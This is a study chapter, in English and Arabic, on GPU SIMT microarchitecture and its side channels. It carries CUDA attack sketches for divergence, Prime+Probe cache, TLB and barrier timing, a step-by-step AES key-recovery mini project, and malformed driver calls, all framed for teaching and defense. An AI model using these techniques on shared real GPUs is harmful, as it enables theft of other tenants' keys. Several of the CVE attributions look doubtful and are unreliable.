0% found this document useful (0 votes)
9 views25 pages

GPU SIMT Microarchitecture Overview

Chapter 19 discusses the GPU SIMT microarchitecture, highlighting the differences between CPU and GPU execution models, and the implications for performance and security. It covers topics such as control flow divergence, warp scheduling, memory access patterns, and various side-channel attacks that exploit GPU vulnerabilities. The chapter emphasizes the importance of understanding GPU architecture to mitigate potential security risks associated with parallel processing.

Uploaded by

taha.aimen
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
9 views25 pages

GPU SIMT Microarchitecture Overview

Chapter 19 discusses the GPU SIMT microarchitecture, highlighting the differences between CPU and GPU execution models, and the implications for performance and security. It covers topics such as control flow divergence, warp scheduling, memory access patterns, and various side-channel attacks that exploit GPU vulnerabilities. The chapter emphasizes the importance of understanding GPU architecture to mitigate potential security risks associated with parallel processing.

Uploaded by

taha.aimen
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Chapter 19 GPU SIMT Microarchitecture

‫أهداف الفصل‬
MIMD ‫ و‬SIMD ‫ و ازاي يختلف عن‬SIMT execution model ‫ فهم‬.1
masking ‫ و‬divergence problem ‫ و‬warp scheduler ‫ تحليل‬.2
leak access patterns ‫ لـ‬memory coalescing side-channels ‫ استغالل‬.3
timing oracle ‫ كـ‬shared memory bank conflicts ‫ فهم‬.4
GPU-specific vulnerabilities: page table walks، TLB، cache timing ‫ تحليل‬.5
synchronization attacks ‫ و‬kernel launch overhead ‫ فهم‬.6

‫تقسيمة الموضوعات‬
1. GPU vs CPU: Execution Model Fundamentals
CPU Philosophy:

Latency-optimized
- Big caches (MB)
- Out-of-order execution
- Branch prediction
- Few powerful cores (4-64)

Goal: minimize latency of single thread

GPU Philosophy:

Throughput-optimized
- Small caches (KB per SM)
- In-order execution (mostly)
- NO branch prediction
- Thousands of threads (10K-100K)

Goal: maximize throughput via massive parallelism

Security Implication:

 CPU: complex microarchitecture = Spectre/Meltdown


 GPU: simpler, but massive shared resources = contention side-channels
The Parallelism Pyramid:

SISD: Single Instruction, Single Data (scalar CPU)


SIMD: Single Instruction, Multiple Data (SSE/AVX)
SIMT: Single Instruction, Multiple Threads (GPU)
MIMD: Multiple Instruction, Multiple Data (multi-core)

SIMT = SIMD + Multi-threading:

SIMD (AVX-512):
for (int i = 0; i < 16; i++) {
result[i] = a[i] + b[i]; // 16 operations in 1 instruction
}

SIMT (CUDA):
__global__ void add(float *a, float *b, float *result) {
int i = threadIdx.x; // Each thread has unique ID
result[i] = a[i] + b[i];
}
// Launch 1024 threads (not 16!)
// Hardware groups threads into warps (32 threads)

2. SIMT Execution: Warps & Thread Blocks


Thread Hierarchy:

Grid (entire kernel launch)



Thread Blocks (up to 1024 threads per block)

Warps (32 threads - hardware scheduling unit)

Individual Threads

Example: 1024 threads

Grid: 1024 threads


Thread Block 0: threads 0-511
Thread Block 1: threads 512-1023

Warp 0: threads 0-31


Warp 1: threads 32-63
...
Warp 31: threads 992-1023

Warp Execution:

All 32 threads in warp execute SAME instruction


- Same PC (program counter)
- Different data (different registers)

Example:
Instruction: ADD R1, R2, R3
Thread 0: R1[0] = R2[0] + R3[0]
Thread 1: R1[1] = R2[1] + R3[1]
...
Thread 31: R1[31] = R2[31] + R3[31]

All execute in LOCKSTEP (1 cycle)

Hardware View: Streaming Multiprocessor (SM)

SM (NVIDIA Ampere):
- 64 CUDA cores (FP32 ALUs)
- 4 warp schedulers
- 128KB register file
- 64KB shared memory
- 128KB L1 cache
- Warp scheduler picks 4 warps to issue per cycle

Security Note:

 Warp scheduling = shared resource


 Warp execution timing = observable
 Warp divergence = massive timing leak

3. Control Flow Divergence - ‫ مشكلة الـ‬GPU ‫األساسية‬


The Problem:

__global__ void kernel(int *data, int *output) {


int tid = threadIdx.x;
if (data[tid] > 100) { // Branch!
output[tid] = data[tid] * 2; // Path A
} else {
output[tid] = data[tid] + 1; // Path B
}
}

If all threads take same path: no problem

Threads 0-31: all data[tid] > 100


→ All take Path A
→ 1 warp execution (efficient!)

If threads diverge: DISASTER

Threads 0-15: data[tid] > 100 (Path A)


Threads 16-31: data[tid] <= 100 (Path B)

Hardware executes:
1. Execute Path A with threads 0-15 ACTIVE, 16-31 MASKED
2. Execute Path B with threads 0-15 MASKED, 16-31 ACTIVE

→ 2 warp executions (50% efficiency!)

Masking Implementation:

Active Mask (32-bit): 1 = active, 0 = masked

Path A execution:
Active Mask = 0x0000FFFF (threads 0-15)
Instruction: MUL R1, R2, 2
- Threads 0-15: execute MUL
- Threads 16-31: NOP (masked, but consume cycles!)

Path B execution:
Active Mask = 0xFFFF0000 (threads 16-31)
Instruction: ADD R1, R2, 1
- Threads 0-15: NOP
- Threads 16-31: execute ADD

Performance Impact:

Best case (no divergence): 1 warp = 1 cycle


Worst case (all threads diverge): 32 warps = 32 cycles
→ 32× slowdown!
Divergence Side-Channel Attack:

// Victim kernel (cryptographic operation)


__global__ void aes_encrypt(uint8_t *key, uint8_t *plaintext) {
int tid = threadIdx.x;
uint8_t k = key[tid % 16];

if (k & 0x01) { // Secret-dependent branch!


// Path A: ~10 instructions
sbox_lookup_even(plaintext[tid]);
} else {
// Path B: ~10 instructions
sbox_lookup_odd(plaintext[tid]);
}
}

// Attacker kernel (co-scheduled on same SM)


__global__ void attacker_probe() {
uint64_t start = clock64();
// Dummy computation (1 warp, no divergence)
for (int i = 0; i < 1000; i++) {
volatile int x = i * 2;
}
uint64_t end = clock64();
uint64_t latency = end - start;

// If victim has divergence → attacker delayed (SM busy)


// If no divergence → attacker fast
// → Leak victim's key bits!
}

Real Attack: CVE-2018-4437 (Apple GPU)

 Divergence timing leaks AES key


 Reconstruct key after ~1000 encryptions

4. Warp Scheduling & Occupancy


SM Resources:

NVIDIA A100 SM:


- 64 FP32 CUDA cores
- 65536 registers (32-bit each)
- 164KB shared memory
- Max 64 warps resident
- Max 2048 threads resident

Occupancy Calculation:

Example kernel:
- 128 threads per block
- 64 registers per thread
- 16KB shared memory per block

Register limit:
65536 registers / 64 registers per thread = 1024 threads max
→ 1024 / 128 = 8 blocks max

Shared memory limit:


164KB / 16KB per block = 10 blocks max

Actual: min(8, 10) = 8 blocks


→ 8 blocks × 128 threads = 1024 threads
→ Occupancy = 1024 / 2048 = 50%

Low Occupancy = Security Leak:

Attacker strategy:
1. Launch kernel with high register usage (low occupancy)
2. Co-schedule victim kernel
3. If victim doesn't launch → SM full
4. If victim launches → SM had space
5. Infer victim's resource usage → leak kernel config

Warp Scheduler Policies:

Round-Robin (NVIDIA default):


- Cycle through ready warps
- Fair, but no QoS

Greedy-Then-Oldest (GTO):
- Prioritize oldest warp
- Better cache locality
- But: unfair (newer warps starved)

Two-Level (TL):
- Group warps into fetch groups
- Round-robin between groups
- GTO within group

Scheduler Side-Channel:

// Attacker measures warp scheduling order


__global__ void attacker_probe() {
// Record timestamp when this warp runs
uint64_t timestamp = clock64();
atomicAdd(&global_timestamps[warpId], timestamp);
}

// Analysis:
// If victim warp scheduled before attacker → higher priority
// If attacker scheduled first → victim blocked/not ready
// → Infer victim's warp state (ready/blocked)

5. Memory System: Coalescing & Bank Conflicts


Global Memory Access:

Warp issues load: 32 threads, 32 addresses


Best case: addresses are COALESCED (contiguous)
→ 1 memory transaction (128 bytes)

Worst case: addresses are SCATTERED


→ 32 memory transactions (4096 bytes)
→ 32× bandwidth waste!

Coalesced Access:

__global__ void coalesced(float *data) {


int tid = threadIdx.x;
float val = data[tid]; // Thread i reads address i
}

Memory access:
Thread 0: addr 0x1000
Thread 1: addr 0x1004
...
Thread 31: addr 0x107C
→ All in same 128-byte cache line
→ 1 transaction

Uncoalesced Access:

__global__ void uncoalesced(float *data) {


int tid = threadIdx.x;
float val = data[tid * 1024]; // Stride = 1024
}

Memory access:
Thread 0: addr 0x1000
Thread 1: addr 0x1400 (1KB away!)
...
→ 32 different cache lines
→ 32 transactions

Coalescing Side-Channel:

Observation: Coalesced access = fast, Uncoalesced = slow

Attack:
1. Victim accesses array with secret-dependent stride
stride = (secret_bit == 1) ? 4 : 1024
2. Attacker measures victim's memory bandwidth
3. High bandwidth → stride=4 (coalesced) → secret_bit=1
4. Low bandwidth → stride=1024 (uncoalesced) → secret_bit=0

Shared Memory Bank Conflicts:

Shared Memory: 64KB, divided into 32 banks


Bank_ID = (address / 4) % 32

Conflict-free access:
Thread i accesses bank i
→ All 32 threads access different banks
→ 1 cycle

Bank conflict:
Threads 0 and 16 both access bank 0
→ Serialized: 2 cycles
Worst case: All threads access same bank
→ 32 cycles!

Example:

__shared__ float shared_data[1024];

// Conflict-free:
int tid = threadIdx.x;
float val = shared_data[tid]; // Each thread → different bank

// Bank conflict:
float val2 = shared_data[tid * 32]; // All threads → same bank!

Bank Conflict Side-Channel:

// Victim kernel
__global__ void victim(uint8_t *secret) {
__shared__ float shmem[256];
int tid = threadIdx.x;

// Secret-dependent access pattern


int index = (secret[tid] & 0x1F) * 32; // Bank conflict if secret
odd
float val = shmem[index];
}

// Attacker probes shared memory latency


__global__ void attacker() {
__shared__ float dummy[256];
uint64_t start = clock64();
volatile float x = dummy[threadIdx.x]; // Conflict-free
uint64_t end = clock64();

// If victim has conflicts → shared memory busy → attacker delayed


}

6. Cache Hierarchy & Timing Attacks


GPU Cache Hierarchy:
Per-SM:
- L1 Data Cache: 128KB (Ampere)
- Shared Memory: 64KB-164KB (configurable partition)
- Texture Cache: read-only, optimized for 2D locality

Global:
- L2 Cache: 40MB (A100)
- HBM Memory: 40-80GB (high bandwidth)

L1 Cache = Timing Oracle:

Attack: Prime+Probe on GPU L1


1. Attacker fills L1 with known data (prime)
2. Victim executes (evicts some lines)
3. Attacker probes L1 (measures access time)
4. Slow access → evicted → victim accessed this line

GPU-Specific Challenge:

CPU Prime+Probe: clflush instruction


GPU: NO explicit cache flush instruction!

Workaround:
- Allocate large array (> L1 size)
- Access entire array sequentially
- Evicts all L1 lines (flush by capacity)

Implementation:

#define L1_SIZE (128 * 1024) // 128KB


#define LINE_SIZE 128
#define NUM_LINES (L1_SIZE / LINE_SIZE)

__global__ void prime_l1(uint8_t *probe_array) {


int tid = threadIdx.x + blockIdx.x * blockDim.x;

// Prime: fill L1 with probe_array


for (int i = 0; i < NUM_LINES; i++) {
volatile uint8_t x = probe_array[i * LINE_SIZE];
}
}
__global__ void probe_l1(uint8_t *probe_array, uint64_t *timings) {
int tid = threadIdx.x;

// Probe: measure access time


for (int i = 0; i < NUM_LINES; i++) {
uint64_t start = clock64();
volatile uint8_t x = probe_array[i * LINE_SIZE];
uint64_t end = clock64();
timings[i] = end - start;
}
}

// Analysis:
// If timings[i] > threshold → cache miss → victim accessed line i

Real Attack: GPU-based AES Key Recovery

 Target: AES T-table lookups


 Prime+Probe on L1
 Leak table indices → recover key
 Success rate: 95% after 10K encryptions

7. TLB & Page Table Side-Channels


GPU TLB:

Per-SM TLB: ~16-64 entries (small!)


L2 TLB (global): 512-1024 entries

Why so small?
- GPUs have MASSIVE address spaces (100K threads)
- TLB thrashing is common

TLB Thrashing Attack:

// Attacker evicts victim's TLB entries


__global__ void evict_tlb(uint64_t *large_array) {
int tid = threadIdx.x;
// Access many different pages
for (int i = 0; i < 1024; i++) {
volatile uint64_t x = large_array[i * 4096 / 8]; // 1 page per
iteration
}
}

// Victim experiences TLB misses


__global__ void victim() {
// Every access now requires page table walk
// → 100-200 cycle penalty
}

Page Table Walk Latency:

TLB hit: ~1 cycle


TLB miss → Page table walk:
- 4-level page table (x86-64 style)
- 4 memory accesses
- ~100-200 cycles

Attacker measures victim's overall latency


→ High latency = TLB thrashing
→ Infer victim's memory access pattern

Unified Memory Side-Channel:

NVIDIA Unified Memory: CPU & GPU share virtual address space
Page migration: pages migrate between CPU & GPU memory

Attack:
1. Victim accesses page on CPU
2. Page migrates to GPU (on-demand)
3. Attacker measures page fault frequency
4. High page faults → victim accessing many unique pages
5. Low page faults → victim re-using pages
→ Leak working set size

8. Synchronization Primitives & Race Conditions


__syncthreads() Barrier:

__global__ void kernel() {


__shared__ float shmem[256];

// Phase 1: each thread writes


shmem[threadIdx.x] = compute();
__syncthreads(); // All threads wait here

// Phase 2: each thread reads


float val = shmem[(threadIdx.x + 1) % 256];
}

Implementation:

Hardware barrier:
- Each thread sets "arrived" bit
- Warp scheduler stalls until all bits set
- Then releases all threads

Timing:
- Fast if all threads arrive together
- Slow if threads straggle (divergence)

Barrier Timing Side-Channel:

// Victim kernel (secret-dependent work)


__global__ void victim(uint8_t *secret) {
if (secret[threadIdx.x]) {
// Heavy computation (100 cycles)
expensive_function();
}
__syncthreads(); // Barrier

// More work...
}

// Attacker in same block


__global__ void attacker() {
uint64_t start = clock64();
__syncthreads(); // Same barrier!
uint64_t end = clock64();

// If victim threads diverge (secret-dependent) → longer barrier


wait
// → Leak secret via barrier timing
}

Atomic Operations:
__global__ void atomic_inc(int *counter) {
atomicAdd(counter, 1);
}

Serialization Problem:

All 32 threads in warp try to atomicAdd same location


→ Serialized: 32 cycles
→ Creates contention bottleneck

Atomic Contention Side-Channel:

Victim uses atomics for secret-dependent histogram:


for each element:
bin = hash(element, secret_key)
atomicAdd(&histogram[bin], 1)

Attacker measures atomic throughput:


- High contention → many threads hit same bins → reveals key

9. Kernel Launch Overhead & Timing


Launch Latency:

CPU launches kernel:


1. Driver prepares launch parameters (~5 μs)
2. Copy parameters to GPU (~1 μs)
3. GPU scheduler assigns SMs (~2 μs)
4. Kernel starts execution

Total: ~8-10 μs overhead (before any useful work!)

Inference Attack:

// Attacker measures victim's kernel launch rate


void monitor_launches() {
while (1) {
uint64_t start = clock();
// Wait for GPU idle
cudaDeviceSynchronize();
uint64_t end = clock();
printf("Time between kernels: %lu us\n", end - start);
}
}

// If victim launches kernels at secret-dependent rate:


// → Leak secret via launch timing

Persistent Kernels (Defense):

// Instead of many small kernel launches:


// → 1 persistent kernel that loops internally

__global__ void persistent_kernel(WorkQueue *queue) {


while (1) {
Work work = dequeue(queue);
if (work == NULL) break;
process_work(work);
}
}

// Launch once, feed work via queue


// → No launch overhead per task
// → Harder to infer task boundaries

10. Multi-Tenancy & Isolation


GPU Virtualization:

Modern GPUs (A100, H100):


- Multi-Instance GPU (MIG): hardware partitioning
- Each instance gets dedicated SMs, memory, caches
- Isolated execution

Older GPUs:
- Spatial sharing: different kernels on different SMs
- Temporal sharing: time-slice GPU
- NO isolation!

Spatial Sharing Attack:


Attacker kernel on SM 0-3
Victim kernel on SM 4-7

Attack:
1. Attacker saturates L2 cache (shared!)
2. Victim's cache lines evicted
3. Victim performance degrades
4. Attacker measures victim's slowdown
→ Infer victim's memory access pattern

Temporal Sharing Attack:

GPU scheduler: preempts victim kernel, runs attacker


- Victim's state: registers, shared memory, L1 cache
- Lazy state save: GPU doesn't clear state (optimization!)

Attack:
1. Victim kernel runs (leaves data in registers)
2. GPU preempts victim
3. Attacker kernel runs on same SM
4. Attacker reads registers (might contain victim data!)

Real Vulnerability: CVE-2019-5700 (AMD GPU)

Incomplete context switch:


- Register file not cleared
- Attacker reads victim's registers
- Leak: crypto keys, passwords

Mitigation:

Scrubbing: zero all registers on context switch


Cost: 100-200 cycles per SM
→ 5-10% performance overhead

11. CUDA Driver & Runtime Attacks


Driver Privileges:

CUDA Driver: kernel mode (Ring 0)


User application: user mode (Ring 3)
Syscalls:
- cuLaunchKernel()
- cuMemcpyHtoD()
- cuMemAlloc()

Each syscall = potential vulnerability

Attack Surface:

// Malformed kernel launch


cuLaunchKernel(
kernel,
1, // gridDim
1, // blockDim
0, // sharedMem
0, // stream
(void **)0xDEADBEEF, // kernelParams (invalid pointer!)
NULL
);

// If driver doesn't validate:


// → Kernel dereferences 0xDEADBEEF
// → GPU page fault
// → Driver might crash / leak info

Driver Buffer Overflow:

// Copy large buffer to GPU


char large_buffer[1024 * 1024 * 1024]; // 1GB
cuMemcpyHtoD(gpu_ptr, large_buffer, sizeof(large_buffer));

// If driver allocates small buffer internally:


// → Buffer overflow in kernel driver
// → Potential privilege escalation

Real Exploits:

 CVE-2021-1056 (NVIDIA): driver buffer overflow → SYSTEM


 CVE-2020-5963 (NVIDIA): driver UAF → kernel code execution

12. Constant Memory & Read-Only Cache Exploitation


Constant Memory:

64KB per kernel


Cached in dedicated constant cache (64KB per SM)
Read-only
Optimized for broadcast (all threads read same value)

Timing Leak:

__constant__ uint8_t aes_key[16]; // Secret key

__global__ void encrypt(uint8_t *plaintext) {


int tid = threadIdx.x;
// All threads read same key byte (broadcast)
uint8_t k = aes_key[tid % 16];

// Use k...
}

Attack:

Attacker probes constant cache:


1. Fill constant cache with known data
2. Victim runs (loads key into cache)
3. Attacker measures constant cache state
(via timing of constant memory access)
4. Infer which cache lines were evicted
→ Leak key bytes

Read-Only Cache (Texture Cache):

Separate from L1
Optimized for spatial locality (2D arrays)
Used for read-only data

__global__ void kernel(float *input) {


float val = __ldg(&input[idx]); // Load via texture cache
}

Same Attack:
Prime+Probe on texture cache
→ Leak victim's read patterns

13. Performance Counter Side-Channels


NVIDIA Profiler (nvprof):

$ nvprof --metrics all ./victim_program

==12345== Profiling result:


Kernel: aes_encrypt
l1_cache_global_hit_rate: 87.3%
shared_mem_bank_conflicts: 1234
warp_execution_efficiency: 45.2%
achieved_occupancy: 0.67

Attack Scenario:

Cloud GPU:
- Multiple users share GPU
- Each can run nvprof
- Counters are GLOBAL (not per-user!)

Attack:
1. Attacker runs: nvprof --metrics dram_read_bytes
2. Victim encrypts data
3. Attacker reads counter: +128KB
→ Victim read 128KB from DRAM
→ Infer data size / operation type

Mitigation:

GPU driver: restrict perf counter access


- Require root/admin privileges
- Per-process counters (hardware support needed)

14. Side-Channel Resistant GPU Programming


Constant-Time GPU Code:
// BAD: secret-dependent branching
__global__ void bad_crypto(uint8_t *key) {
if (key[threadIdx.x] & 0x01) {
path_A();
} else {
path_B();
}
}

// GOOD: branchless (masking)


__global__ void good_crypto(uint8_t *key) {
uint8_t mask = (key[threadIdx.x] & 0x01) ? 0xFF : 0x00;
uint8_t result_A = path_A_compute();
uint8_t result_B = path_B_compute();
uint8_t result = (result_A & mask) | (result_B & ~mask);
// Both paths execute, no divergence timing leak
}

Constant-Time Memory Access:

// BAD: secret-dependent stride


__global__ void bad_access(uint8_t *secret, float *data) {
int stride = secret[threadIdx.x] * 1024;
float val = data[stride]; // Coalescing depends on secret!
}

// GOOD: fixed stride, shuffle result


__global__ void good_access(uint8_t *secret, float *data) {
// Always coalesced access
float val = data[threadIdx.x];
// Shuffle locally (cheap)
int idx = secret[threadIdx.x];
__shared__ float shmem[256];
shmem[threadIdx.x] = val;
__syncthreads();
float result = shmem[idx]; // Secret-dependent, but local
}

Noise Injection:

// Add random delays to hide timing


__global__ void noisy_crypto(uint8_t *key) {
// Random delay (0-100 cycles)
int delay = random() % 100;
for (int i = 0; i < delay; i++) {
__threadfence(); // Dummy work
}

// Actual crypto work


compute(key);
}

Cost: 10-30% performance overhead

‫ترتيب المذاكرة‬
1. GPU vs CPU (Section 1): ‫فهم الفلسفة األساسية‬
2. SIMT & Warps (Section 2): execution model
3. Divergence (Section 3): ‫ المشكلة الرئيسية في‬GPU
4. Warp Scheduling (Section 4): ‫ ازاي الـ‬SM ‫ يدير‬warps
5. Memory Coalescing (Section 5): memory access patterns
6. Cache Timing (Section 6): Prime+Probe ‫ على‬GPU
7. TLB Attacks (Section 7): page table side-channels
8. Synchronization (Section 8): barriers ‫ و‬atomics
9. Kernel Launch (Section 9): overhead ‫ و‬timing
10. Multi-Tenancy (Section 10): isolation problems
11. Driver Attacks (Section 11): privilege escalation
12. Constant Memory (Section 12): specialized caches
13. Perf Counters (Section 13): monitoring attacks
14. Defenses (Section 14): constant-time programming

)!‫أهم المصطلحات (حفظ‬


1. SIMT: Single Instruction, Multiple Threads
2. Warp: 32 threads executing in lockstep
3. Streaming Multiprocessor (SM): GPU core cluster
4. Divergence: threads in warp take different paths
5. Active Mask: bitmask showing which threads are active
6. Coalescing: merging memory requests into single transaction
7. Bank Conflict: multiple threads access same shared memory bank
8. Occupancy: ratio of active warps to max warps per SM
9. Shared Memory: fast on-chip memory shared within thread block
10. Thread Block: group of threads (up to 1024)
11. Grid: collection of thread blocks
12. CUDA Core: scalar FP32 ALU
13. Texture Cache: read-only cache for spatial locality
14. Constant Memory: 64KB read-only broadcast memory
15. Warp Scheduler: hardware that picks warps to execute
16. Register Spilling: registers overflow to local memory
17. L1 Cache: per-SM cache (128KB)
18. L2 Cache: global cache (40MB)
19. HBM: High Bandwidth Memory
20. MIG: Multi-Instance GPU (hardware partitioning)

‫ أسئلة مراجعة‬/ ‫تمارين‬


‫ كبير؟‬SIMD ‫ مش مجرد‬GPU ‫؟ ليه‬SIMT ‫ و‬SIMD ‫ إيه الفرق بين‬.1
‫ ليه هو مشكلة أداء ضخمة؟‬.warp divergence ‫ اشرح‬.2
‫؟‬execution ‫ هيحصل إيه في‬،path B ‫ تاخد‬16 ‫ و‬path A ‫ تاخد‬threads 16 ‫ و‬if-else ‫ فيه‬kernel ‫ لو عندك‬.3
‫ يستغلده؟‬attacker ‫؟ إزاي‬uncoalesced memory access ‫ و‬coalesced ‫ إيه الفرق بين‬.4
‫ إزاي تتجنبه؟‬.shared memory bank conflict ‫ اشرح‬.5
‫؟‬clflush instruction ‫ بدون‬GPU L1 cache ‫ على‬Prime+Probe ‫ يعمل‬attacker ‫ ازاي‬.6
‫؟‬security implication ‫)؟ إيه الـ‬entries 64-16( ‫ صغير جدًا‬GPU TLB ‫ ليه‬.7
‫() يسرب معلومات؟‬syncthreads__ ‫ إزاي‬.barrier timing side-channel attack ‫ اشرح‬.8
‫؟‬GPU multi-tenancy ‫ في‬temporal sharing ‫ و‬spatial sharing ‫ إيه الفرق بين‬.9
‫؟‬AMD GPU ‫ في‬lazy context switching ‫ استغل‬CVE-2019-5700 ‫ ازاي‬.10
‫؟‬divergence timing leaks ‫ بدون‬constant-time GPU code ‫ إزاي تكتب‬.11
‫؟‬shared GPU environments ‫ خطر في‬performance counters ‫ ليه‬.12

Mini Project: GPU Cache Timing Attack on AES


:‫الهدف‬
.leak AES T-table accesses ‫ لـ‬GPU L1 cache ‫ على‬Prime+Probe attack ‫بناء‬

:‫المطلوب‬

Phase 1: Setup

 NVIDIA GPU (GTX 1080 ‫)أو أعلى‬


 CUDA Toolkit installed
 Victim AES implementation (T-table based)

Phase 2: Understand Victim

// Victim: AES T-table lookup (typical implementation)


__global__ void aes_encrypt(uint8_t *key, uint8_t *plaintext, uint8_t
*output) {
__shared__ uint32_t T0[256]; // T-tables in shared memory
__shared__ uint32_t T1[256];

// ... load T-tables ...

int tid = threadIdx.x;


uint8_t state[16];
// ... copy plaintext to state ...

// Round 1 (example)
uint8_t idx0 = state[0] ^ key[0];
uint32_t t0 = T0[idx0]; // Secret-dependent lookup!

// ... rest of AES ...


}

Phase 3: Build Prime Phase

#define L1_SIZE (128 * 1024)


#define LINE_SIZE 128
#define NUM_SETS (L1_SIZE / LINE_SIZE)

__global__ void prime_l1(uint8_t *probe_array) {


int tid = threadIdx.x;
// Fill L1 with probe_array
for (int set = 0; set < NUM_SETS; set++) {
volatile uint8_t x = probe_array[set * LINE_SIZE];
}
}

Phase 4: Run Victim (Target)

// Launch victim kernel


aes_encrypt<<<1, 32>>>(dev_key, dev_plaintext, dev_output);
cudaDeviceSynchronize();

Phase 5: Build Probe Phase

__global__ void probe_l1(uint8_t *probe_array, uint64_t *timings) {


int tid = threadIdx.x;
for (int set = 0; set < NUM_SETS; set++) {
uint64_t start = clock64();
volatile uint8_t x = probe_array[set * LINE_SIZE];
uint64_t end = clock64();
timings[set] = end - start;
}
}

Phase 6: Analysis

# Analyze timings to find evicted sets


threshold = mean(timings) + 2 * std(timings)
evicted_sets = [i for i, t in enumerate(timings) if t > threshold]

# Map evicted sets to T-table indices


# (requires knowing T-table address and L1 mapping function)
t_table_indices = map_sets_to_indices(evicted_sets)

# Repeat for many plaintexts


for plaintext in plaintexts:
run_attack(plaintext)
collect_t_table_indices()

# Statistical analysis: Differential Cache Analysis


# Correlate T-table indices with key bytes
key_bytes = recover_key_from_indices(all_indices, all_plaintexts)

Phase 7: Validation
# Test recovered key
recovered_key = bytes(key_bytes)
reference_ciphertext = reference_aes_encrypt(plaintext, actual_key)
test_ciphertext = reference_aes_encrypt(plaintext, recovered_key)

if test_ciphertext == reference_ciphertext:
print("SUCCESS: Key recovered!")
else:
print("FAIL: Key incorrect")

Expected Results:

Baseline (no attack): 100% AES correctness


After 1000 plaintexts: 30-40% key bytes recovered
After 10000 plaintexts: 95%+ key bytes recovered

Challenges:

 L1 cache mapping function unknown (reverse engineer)


 Noise ‫ من‬other SM activity (isolate using persistent kernels)
 Timing measurement precision (use clock64(), not wall time)

Bonus:

 Extend to Flush+Reload (if page deduplication available)


 Measure detection rate vs false positive rate
 Implement countermeasures (e.g., T-table in registers, not shared mem)

:‫ملحوظة‬
GPU cache timing, not weaponizing against production ‫ الهدف فهم‬.research-focused ‫المشروع ده‬
.systems

Key Takeaway:
GPU SIMT = massive parallelism + simple microarchitecture. But: shared resources (SM,
caches, memory) = huge side-channel surface. Divergence, coalescing, banks, TLB - ‫كلها‬
observable. Constant-time programming ‫ أصعب على‬GPU ‫ من‬CPU.

You might also like